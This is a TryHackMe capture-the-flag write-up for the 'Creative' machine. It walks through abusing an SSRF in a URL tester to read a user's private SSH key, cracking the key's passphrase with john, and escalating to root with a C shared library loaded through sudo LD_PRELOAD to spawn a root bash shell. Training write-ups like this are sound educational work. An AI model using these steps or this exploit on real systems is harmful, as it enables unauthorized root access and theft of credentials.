Creative Writeup - Tryhackme

·

3 min read

Exploit a vulnerable web application and some misconfigurations to gain root privileges.

The following is a quick summary of the boot2root machine - 'Creative' created by ssaadakhtarr.

Sections


Introduction


The Creative machine was an easy rated machine involving foothold via a simple SSRF to privilege escalation using LD_PRELOAD shared library manipulation.

Enumeration


Initial Scan with Nmap

We began by using the Nmap tool to scan the target machine, revealing two open ports: 80 and 22.

Website Exploration

Port 80 led us to a website hosted at creative.thm. After adding the hostname to our hosts file, we explored the website. However, we found it mainly contained static content with many dead links.

Directory and Subdomain Bruteforcing

Despite our efforts, traditional directory and subdomain bruteforcing didn't yield much useful information.

Discovery of 'beta.creative.thm'

Eventually, we discovered an endpoint named 'beta.creative.thm' through further exploration. This endpoint hosted a 'Beta URL Tester' page, which allowed input of URLs to check if they were alive or dead.

Suspected SSRF

Due to the nature of the 'Beta URL Tester' functionality, we suspected a Server-Side Request Forgery (SSRF) vulnerability.

Port Scanning with Burp Intruder

To investigate further, we used Burp Intruder for port scanning and identified an open port 1337.

When requesting http://127.0.0.1:1337/ we receive a directory listing, now from here we can enumerate this further for each directory and finally find the .ssh/id_rsa file in /home/saad .

Now that id_rsa had a password, use ssh2john to convert to sshng hash format and then crack it using john and rockyou.txt to get the password for id_rsa and finally login as saad!

$ chmod 600 id_rsa
$ ssh -i id_rsa saad@creative.thm

Foothold


With access to the system as the user 'saad', we located a bash history file containing Saad's password. Utilizing this password, we examined the sudo privileges using the command 'sudo -l', revealing the following permissions:

Matching Defaults entries for saad on m4lware:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
env_keep+=LD_PRELOAD

User saad mays run the following commands on m4lware:
(root) /usr/bin/ping

The permissions indicated a potential Local Dynamic Shared Object (LD_PRELOAD) privilege escalation vulnerability.

Privilege Escalation


Understanding that LD_PRELOAD and shared libraries can be manipulated to execute arbitrary code with elevated privileges, we crafted an exploit script:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

void _init(){
    unsetenv("LD_PRELOAD");
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}

Compiling the script as a shared library using the command
gcc -fPIC -shared -nostartfiles -o exploit.so exploit.c,
we then executed it with root privileges using the following command:

sudo LD_PRELOAD=./exploit.so /usr/bin/ping

This allowed us to gain a shell as the root user, granting access to the root.txt file and completing the challenge.


Note: This writeup provides a walkthrough of the 'Creative' machine and was partially summarized using a LLM.